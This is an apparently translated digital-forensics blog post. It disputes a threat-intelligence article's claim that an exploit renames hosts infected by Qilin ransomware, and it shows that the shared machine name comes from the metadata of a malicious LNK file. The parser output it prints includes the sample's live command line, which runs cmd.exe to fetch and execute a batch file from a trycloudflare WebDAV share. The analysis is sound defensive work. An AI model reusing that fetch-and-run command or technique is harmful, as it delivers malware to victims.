Windows事件响应:勒索软件痕迹分析
我最近阅读了FalconFeeds关于Qilin勒索软件的文章;由于我长期从事DFIR咨询工作,并处理过大量勒索软件事件,这类标题的文章总能吸引我的注意。我从不假定自己了解一切,事实上,我对其他调查人员基于自身研究提供的见解非常感兴趣。因此,这类文章总能引起我的关注。
然而,在阅读这篇文章时,我有些困惑。考虑以下引文:
经过仔细检查,Stack Overflow帖子背后的个体很可能是受感染受害者而非攻击者。这一评估得到以下事实支持:另一个IP地址107[.]167[.]93[.]118被观察到使用相同的机器名称(WIN-8OA3CCQAE4D)和相同的配置细节。这种在多个不相关系统间的一致性强烈表明,漏洞利用会自动重命名受感染主机,在公共论坛中无意间留下了统一的系统标识符。[重点添加]
这个说法很有趣。例如,在工作/日常工作中,我们多次观察到这个工作站名称,但对应不同的IP地址。这些观察发生在不同时间,因此我们认为要么是威胁行为者使用不同方式连接互联网,要么是具有该NetBIOS名称/机器ID的工作站是多人共享的虚拟机。
真正让我困惑的是"漏洞利用"这一表述;虽然文章中多次提到"漏洞利用"这个词,但没有明确说明这个漏洞利用是什么,也没有说明它是如何被发现或定义的。
在博客文章的后面部分,我们看到图1所示的章节。
图1:博客摘录
如果我正确阅读了博客文章,作者的发现包括威胁行为者向目标受害者发送LNK文件这一事实;这如图2所示。
图2:博客摘录
任何关注我工作的人都知道,我对LNK文件非常感兴趣,不仅是从解析的角度,更重要的是利用嵌入的元数据(或缺乏元数据的情况)来开发威胁情报。正如JP/CERT很久以前指出的,发送给目标的LNK文件可以告诉我们很多关于开发者工作站的信息,包括机器ID/NetBIOS名称。据我所知,迄今为止唯一充分利用LNK元数据开发威胁情报的是Mandiant,他们在2018年11月关于APT29的分析报告中有所描述(见图5和图6)。
话虽如此,我们知道许多创建LNK文件的方法/API会自动在LNK元数据中包含创建文件的工作站名称。由于已知该附属组织(见图2)通过发送恶意LNK文件获得对受害者端点的初始访问权限,我们知道LNK文件本身不是在目标端点上创建的;因此,没有理由假设存在一个"漏洞利用"会更改受影响端点的名称。
虽然这是我从未见过或听说过的(再次说明,我会第一个告诉你我并非无所不知…),但这并不意味着不可能。这确实可能发生,但所提供的证据在痕迹知识和经验面前站不住脚。
利用FalconFeed文章中的信息,我能够定位并下载LNK文件的副本(MD5:30fc1856c9e766a507015231a80879a8),并通过我自己的LNK解析器运行它,得到了以下输出:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
guid {00021401-0000-0000-c000-000000000046}
mtime Fri Jan 3 15:02:21 2025 Z
atime Fri Jan 3 15:02:21 2025 Z
ctime Fri Jan 3 15:02:21 2025 Z
basepath C:\Windows\System32\cmd.exe
shitemidlist My Computer/C:\/Windows/System32/cmd.exe
**Shell Items Details (times in UTC)**
C:2021-05-08 08:06:52 M:2025-02-05 09:50:22 A:2025-02-05 09:50:22 Windows (9) [530/1]
C:2021-05-08 08:06:52 M:2025-01-28 21:48:18 A:2025-01-28 21:48:18 System32 (9) [3286/1]
C:2025-01-03 15:02:22 M:2025-01-03 15:02:22 A:2025-01-03 15:02:22 cmd.exe (9)
vol_sn A409-2302
vol_type Fixed Disk
commandline /c "\\cayman-inter-descending-processed.trycloudflare.com@SSL\DavWWWRoot\kma.bat"
iconfilename %SystemRoot%\System32\SHELL32.dll
hotkey 0x0
showcmd 0x7
***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasArguments|EnableTargetMetadata|HasIconLocation|HasRelativePath
***PropertyStoreDataBlock***
GUID/ID pairs:
{28636aa6-953d-11d2-b5d6-00c04fd918d0}/30 ParsingPath: C:\Users\Village Manor 2022\Desktop\osha3165 - Copy.pdf
{446d16b1-8dad-4870-a748-402ea43d788c}/104 VolumeID: {ad378747-1bfd-4172-b598-a876b80c03d9}
{b725f130-47ef-101a-a5f1-02608c9eebac}/10 ItemNameDisplay: osha3165 - Copy.pdf
{b725f130-47ef-101a-a5f1-02608c9eebac}/12 Size: 16040764
{b725f130-47ef-101a-a5f1-02608c9eebac}/14 DateModified: Tue Jul 17 20:17:44 2012 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/15 DateCreated : Thu Feb 6 07:34:38 2025 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/4 ItemType: Microsoft Edge PDF Document
{e3e0584c-b788-4a5a-bb20-7f5a44c9acdd}/6 ItemFolderPathDisplay: C:\Use
***KnownFolderDataBlock***
GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM
***TrackerDataBlock***
Machine ID : win-8oa3ccqae4d
New Droid ID Time : Fri Jan 31 14:29:24 2025 UTC
New Droid ID Seq Num : 5988
New Droid Node ID : e0:09:88:3d:81:23
Birth Droid ID Time : Fri Jan 31 14:29:24 2025 UTC
Birth Droid ID Seq Num: 5988
Birth Droid Node ID : e0:09:88:3d:81:23
|
从上述输出,并回顾Mandiant的文章,我们可以看到关于开发者端点的大量信息,包括工作站名称"win-8oa3ccqae4d"。我们还可以看到大量可能应用于该活动 campaign 的信息,进而可用于充实入侵和威胁情报并提供背景信息。
然而,很明显FalconFeeds文章的作者对Windows痕迹和文件结构缺乏一些了解。通过ANY.RUN运行LNK文件是一种使用方法,但不应该是从该痕迹开发信息的唯一方法。这也支持了我的想法:CTI团队将从深度数字分析技能中受益,以更彻底、正确的方式开发和解释来自各种系统和端点的痕迹。